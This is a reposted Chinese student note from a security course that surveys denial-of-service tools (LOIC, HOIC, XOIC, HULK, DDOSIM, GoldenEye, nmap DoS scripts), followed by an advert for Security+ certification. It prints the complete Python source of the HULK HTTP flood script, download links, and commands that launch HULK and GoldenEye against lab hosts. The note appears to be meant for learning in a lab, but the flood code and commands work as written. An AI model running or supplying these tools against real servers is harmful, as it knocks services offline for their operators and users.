【安全牛学习笔记】拒绝服务***工具
拒絕服務***工具? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? Nmap? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????- grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2 |
root@K:~# cd /usr/share/nmap/scripts/
root@K:/usr/share/nmap/scripts# cat script.db | more
root@K:/usr/share/nmap/scripts# cat scirpt.db | grep dos
root@K:/usr/share/nmap/scripts# nmap -p445 --script=smb-vuln-regsvc-dos.nse 192.168.1.1
Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-05 08:08 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0037s latency).
PORT? ? STATE? ? SERVICE
445/tcp filtered microsoft-ds
MAC Address: 14:75:90:21:4f:56 (Tp-link Technologies)
Nmap done: 1 IP address (1 host up) scanned in 0384 seconds
匿名者拒絕服務工具包???????? 匿名者發布的Dos工具 ???????? ????- LOIC ????????????????? ????- HOIC ????????????????? ????- DDoSer ??????????????? 招募志愿者發放以上工具?????? 以上Dos工具不隱藏真是IP地址 |
盧瓦(LOIC) (Low Orbit Ion Canon)
LOTC是一個最受歡迎的DOS***工具。 這個工具被去年流行的***集團匿名者用于對許多大公司的網絡***。?
它可以通過使用單個用戶執行DOS***小型服務器,工具非常易于使用,即便你是一個初學者。 這個工具執行DOS***通過發送UDP,TCP或HTTP請求到受害者服務器。 你只需要知道服務器的IP地址或URL,其他的就交給這個工具吧
低軌道離子炮(LOIC)是一個開源的網站壓力測試和抗拒絕服務測試工具,由C#語言開發。最初LOIC由Praetox科技開發,目前由開源社區維護。LOIC可以通過TCP或UDP洪水的方式形成拒絕服務***(DoS),因而可能打斷業務正常運行,安全和測試人員在做評估網站壓力測試時,請謹慎使用。 使用教程我記得我發過了自己在吧里找吧。
LOTC可以在linux系統上運行
HOIC不能再linux運行,能在windows運行
root@K:~# ifconfig
192.168.1.116
msfadmin@metasploitable:~$ ifconfig
192.168.1.119
HOIC不能再linux運行,能在windows運行
其他拒絕服務工具???????????????????????????????????????? XOIC? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????-?***任意IP地址的指定端口 ????????????????????????? ????- git clone://git.code/sf.net/p/xoic/code xoic-code ????- http://xoicdoser.wordpress.com/ ?????????????????? ????-?三種模式:test、normal、Dos Attack ??????????????? ????-?支持協議:TCP/HTTP/UDP/ICMP |
- git clone://git.code/sf.net/p/xoic/code xoic-code,這個下載鏈接已經空了,不能下載,另外找下載地址!
XOIC官網地址:http://xoicdoser.wordpress.com/,此鏈接里面的軟件有惡意代碼,建議不要下載!
XOIC是另一個不錯的DOS***工具。它根據用戶選擇的端口與協議執行DOS***任何服務器。XOIC開發者還聲稱XOIC比上面的LOIC在很多方面更強大呢。??
一般來說,該工具有三種***模式,第一個被稱為測試模式,是非常基本的; 第二個是正常的DOS***模式; 最后一個是帶有HTTP / TCP / UDP / ICMP消息的DOS***模式,。?
對付小型網站來說,這是一個很有效的DDOS工具。 但是從來沒有嘗試的要小心點,你可能最終會撞自己的網站的服務器。?
下載地址:https://sourceforge.net/projects/xoic/
其他拒絕服務工具? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? HULK - Http Unbearable Load King? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????- Python腳本? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????-?隨機產生大量唯一的地址請求,避免緩存命中 ????????????????????? ????-?耗盡WEB服務器資源池? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ????- https://packetstormsecurity.com/files/download/112856/hulk.zip |
下載地址:https://github.com/grafov/hulk
Hulk DoS tool?
Hulk DoS tool 移植到Python語言。原來的Python工具由巴里Shteiman?
http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/
我只是移植的實用程序是快速和骯臟的。原函數的名字是保持和原來的邏輯大多保持太。次要功能添加:
您可以設置用于請求的自定義線程數
還設置了程序(好的去功能)所使用的內核的數量
程序正確殺掉Ctl+C
此工具針對性的負載測試,并可能真的很糟糕配置的服務器。明智地使用它。
實例
$ hulk -site http://example.com/test/ 2>/dev/null
$ HULKMAXPROCS=4096 hulk -site http://example.com 2>/tmp/errlog
有用的環境變量:
它設置為你的CPU GOMAXPROCS或更高一些。
hulkmaxprocs限制連接池(默認為1024)。創建高負載使用更高的價值。
更多細節:http://siberian.laika.name/node/7
許可證
亞力山大一grafov grafov@gmail.com版權
原綠巨人實用權威巴里Shteiman(http:/ / sectorix。com)。沒有任何引用許可源比它不是GPL。問作者關于許可證的原始效用。
走巨人牌工具版本。看到許可證。
# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author :? Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print '---------------------------------------------------'
print 'USAGE: python hulk.py <url>'
print 'you can add "safe" after url, to autoshut after dos'
print '---------------------------------------------------'
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print 'Response Code 500'
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread?
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+100<request_counter) & (previous<>request_counter):
print "%d Requests Sent" % (request_counter)
previous=request_counter
if flag==2:
print "\n-- HULK Attack Finished --"
#execute?
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "-- HULK Attack Started --"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
--------------------------------------------------------------------------------------
root@k:~# cd Desktop
root@k:~/Desktop# python hulk.py
----------------------------------------------------
USAGE: python hulk.py <url>
you can add "safe" affter url, to autoshut after dos
----------------------------------------------------
root@k:~/Desktop# python hulk.py http://192.168.1.119
其他拒絕服務工具???????????????????????????? DDoSIM ????????????????????????????????????? ????- 7層拒絕服務工具(模擬多個僵尸機) ???? ????-?隨機IP地址 ??????????????????????????? ????-?基于TCP連接的*** ???????????????????? ????-?應用層DDoS*** ??????????????????????? ????-?正常的HTTP請求、非正常的HTTP請求式DDoS ????- SMTP DDos ???????????????????????????? ????-?隨機端口的TCP連接洪水 |
DDOSIM-Layer?
DDOSIM是另一種流行的DOS***工具。 顧名思義,它是通過模擬控制幾個僵尸主機執行DDOS***。所有僵尸主機創建完整的TCP連接到目標服務器。?
這個工具是用c++寫的,并且在Linux系統上運行。?
這些是DDOSIM的主要特點:?
模擬幾個僵尸***?
隨機的IP地址?
TCP-connection-based***?
應用程序層DDOS***?
HTTP DDos等有效的請求?
與無效請求HTTP DDoS(類似于直流+ +***)?
SMTP DDoS?
TCP洪水連接隨機端口
在這里下載DDOSIM: http://sourceforge.net/projects/ddosim/
其他拒絕服務工具? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? GoldenEye? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ????- http/https拒絕服務***工具? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????-?安全研究為目的的Python腳本? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????-?隨機***向量,keep-alive,避免緩存命中 ????????????????????? ????- wget https://github.com/jseidl/GoldenEye/archive/master.zip ????- unzip master.zip? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ????- ./goldeneye.py http://1.1.1.1 -w 50 |
黃金眼(GoldenEye )HTTP拒絕服務工具?
黃金眼也是一個簡單但有效的DOS***工具。 這是在Python測試開發的DOS***,但是人們也把它當做一種***工具了。
黃金眼
黃金是一個Python應用程序安全測試之用!
黃金是一個HTTP DoS測試工具。
***向量的剝削:HTTP keep-alive +非緩存
使用
USAGE: ./goldeneye.py <url> [OPTIONS]
?OPTIONS:
? ? Flag? ? ? ? ? ?Description? ? ? ? ? ? ? ? ? ? ?Default
? ? -u, --useragents? ?File with user-agents to use? ? ? ? ? ? ? ? ? ? ?(default: randomly generated)
? ? -w, --workers? ? ? Number of concurrent workers? ? ? ? ? ? ? ? ? ? ?(default: 50)
? ? -s, --sockets? ? ? Number of concurrent sockets? ? ? ? ? ? ? ? ? ? ?(default: 30)
? ? -m, --method? ? ? ?HTTP Method to use 'get' or 'post'? or 'random'? (default: get)
? ? -d, --debug? ? ? ? Enable Debug Mode [more verbose output]? ? ? ? ? (default: False)
? ? -h, --help? ? ? ? ?Shows this help
公用事業
工具/ getuas.py -切取用戶代理列表從http://www.useragentstring.com/pages/useragentstring.php子頁面(例如,/ getuas.py http://www.useragentstring.com/pages/browserlist/)需要beautifulsoup4
RES /列表/用戶代理文本列表(每行一個)用戶代理字符串(從http://www.useragentstring.com)
更新日志
2014-02-20添加隨機生成的用戶代理(還是RFC標準)。
2014-02-19刪除無聊的查閱情況和用戶代理。參考改進的隨機性。添加外部用戶代理列表支持。
2013-03-26從線程處理。仍然有一些錯誤解決像我還不知道如何propperly關機經理。
2012-12-09初始釋放
做
從對argparse getopt
從字符串。format() printf一樣
許可證
本軟件是在GNU通用公共許可證3版下的分布式(GPLv3)
法律公告
本軟件提供的教育用途!如果你從事任何非法活動,作者不承擔任何責任。通過使用這個軟件,你同意這些條款。
下載: http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Tool.html
root@k:~/Desktop# wget https://github.com/jseidl/GoldenEye/archive/master.zip? ?//安裝黃金眼
root@k:~/Desktop# unzip master.zip? ? //解壓
root@k:~/Desktop# cd GoldenEye-master/
root@k:~/Desktop/GoldenEye-master# ls
goldeneye.py? README.md? res? util
root@k:~/Desktop/GoldenEye-master# python goldeneye.py
Please supply at least the URL
------------------------------------------------------------------------------------------------------
GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>
?USAGE: ./goldeneye.py <url> [OPTIONS]
?OPTIONS:
?FlagDescription Default
?-u, --useragentsFile with user-agents to use (default: randomly generated)
?-w, --workersNumber of concurrent workers (default: 10)
?-s, --socketsNumber of concurrent sockets (default: 500)
?-m, --methodHTTP Method to use 'get' or 'post'? or 'random'(default: get)
?-d, --debugEnable Debug Mode [more verbose output] (default: False)
?-h, --helpShows this help
------------------------------------------------------------------------------------------------------
root@k:~/Desktop/GoldenEye-master# python goldeneye.py http://192.168.1.119 -w 50 -m random
GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>
Hitting webserver in mode 'random' with 50 workers running 500 connections each. Hit CTRL+C to cancel.
該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類干貨可以移步到安全牛課堂
Security+認證為什么是互聯網+時代最火爆的認證?
? ? ??牛妹先給大家介紹一下Security+
? ? ? ? Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。
? ? ? ?通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。
Security+認證如此火爆的原因???
? ? ? ?原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的,?Security+認證正好可以彌補信息安全技術領域的空白 。
? ??? 目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由于Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。
? ? ???原因二:?IT運維人員工作與翻身的利器。
? ? ???在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對于職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。
? ? ? ? 原因三:接地氣、國際范兒、考試方便、費用適中!
CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。
? ? ? ? 在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證。
轉載于:https://blog.51cto.com/11672938/1973424
總結
以上是生活随笔為你收集整理的【安全牛学习笔记】拒绝服务***工具的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Windows Phone笔记(3)触摸
- 下一篇: 如何搭建安卓开发持续化集成环境(Ubun